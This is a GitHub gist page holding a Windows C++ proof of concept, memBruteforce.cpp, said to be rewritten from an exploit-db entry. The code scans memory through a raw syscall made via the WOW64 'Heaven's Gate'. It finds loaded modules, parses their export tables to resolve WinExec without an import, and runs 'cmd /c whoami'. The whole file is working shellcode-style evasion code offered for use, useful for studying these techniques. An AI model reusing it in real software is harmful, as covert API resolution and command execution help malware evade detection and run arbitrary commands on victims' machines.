-
-
Save a10ncoder/a304744819cd947c9d4f1e591afb31b4 to your computer and use it in GitHub Desktop.
Revisions
-
aaaddress1 revised this gist
Oct 6, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ // memBruteforce.cpp by [email protected] // brute search loaded moudules in memory // rewrite from https://www.exploit-db.com/exploits/45293 #include <Windows.h> -
Oct 6, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,55 @@ // memBruteforce.cpp // brute search loaded moudules in memory // rewrite from https://www.exploit-db.com/exploits/45293 #include <Windows.h> #include <iostream> #pragma warning(disable:4996) bool isMemExist(size_t addr) { int retv; __asm { xor ebx, ebx push[addr] push ebx push ebx push ebx mov eax, 0x29 // ZwAccessCheckAndAuditAlarm call dword ptr fs : [0xc0] // Heaven's Gate add esp, 0x0c pop edx mov[retv], eax } return char(retv) != 5; } size_t bruteSearch_WinAPI(PCSTR apiName) { for (size_t addr = 0x1000; addr < 0xFF000000; addr += 0x1000) if (isMemExist(addr)) { if (PIMAGE_DOS_HEADER(addr)->e_magic == IMAGE_DOS_SIGNATURE) { char modulePath[MAX_PATH]; GetModuleFileNameA(HMODULE(addr), modulePath, sizeof(modulePath)); printf("[+] detect %s at %p\n", modulePath, addr); // parse export table auto nth = PIMAGE_NT_HEADERS(addr + PIMAGE_DOS_HEADER(addr)->e_lfanew); if (auto rva = nth->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) { auto eat = PIMAGE_EXPORT_DIRECTORY(addr + rva); auto nameArr = PDWORD(addr + eat->AddressOfNames); auto funcArr = PDWORD(addr + eat->AddressOfFunctions); auto nameOrd = PWORD(addr + eat->AddressOfNameOrdinals); for (size_t i = 0; i < eat->NumberOfFunctions; i++) if (!stricmp(PCHAR(addr + nameArr[i]), apiName)) return addr + funcArr[nameOrd[i]]; } } } return 0; } int main() { if (auto ptrWinExec = bruteSearch_WinAPI("WinExec")) (decltype(&WinExec)(ptrWinExec))("cmd /c whoami && pause", 1); return 0; }